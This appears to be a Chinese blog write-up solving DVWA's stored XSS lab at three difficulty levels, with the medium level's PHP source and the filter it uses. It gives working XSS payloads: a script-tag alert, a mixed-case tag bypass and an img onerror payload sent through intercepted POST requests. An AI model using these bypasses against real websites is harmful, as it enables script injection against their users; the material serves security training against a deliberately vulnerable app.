刷题之旅第8站,DVWA XSS stored (low,medium,high)

一、什么是XSS stored

XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。

二、DVWA 实战

1、low 难度

Name里内容有长度限制,那么就随便填,
Message 中填入js 代码。

<script>alert(/xsSSSs/)</script>

刷题之旅第8站,DVWA XSS stored (low,medium,high)

成功造成XSS攻击
刷题之旅第8站,DVWA XSS stored (low,medium,high)

2、medium难度

看一下PHP源码

 <?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

我们发现对name的值,只进行了简单字符串替换,大小写绕过,就行了。
name的值有长度限制,使用burp拦截,改包发回去。

txtName=<Script>alert(/xss/)</Script>&mtxMessage=A&btnSign=Sign+Guestbook

刷题之旅第8站,DVWA XSS stored (low,medium,high)
刷题之旅第8站,DVWA XSS stored (low,medium,high)

3、high 难度

与medium难度类似,burp改包。使用img标签。

txtName=<img src=1 one rror=alert('WUQING')>&mtxMessage=A&btnSign=Sign+Guestbook

刷题之旅第8站,DVWA XSS stored (low,medium,high)
刷题之旅第8站,DVWA XSS stored (low,medium,high)

刷题之旅第8站,DVWA XSS stored (low,medium,high)刷题之旅第8站,DVWA XSS stored (low,medium,high) 圆圈勾勒成指纹 发布了24 篇原创文章 · 获赞 2 · 访问量 538 私信 关注
上一篇:DVWA-Brute Force


下一篇:DVWA-XSS(Stored)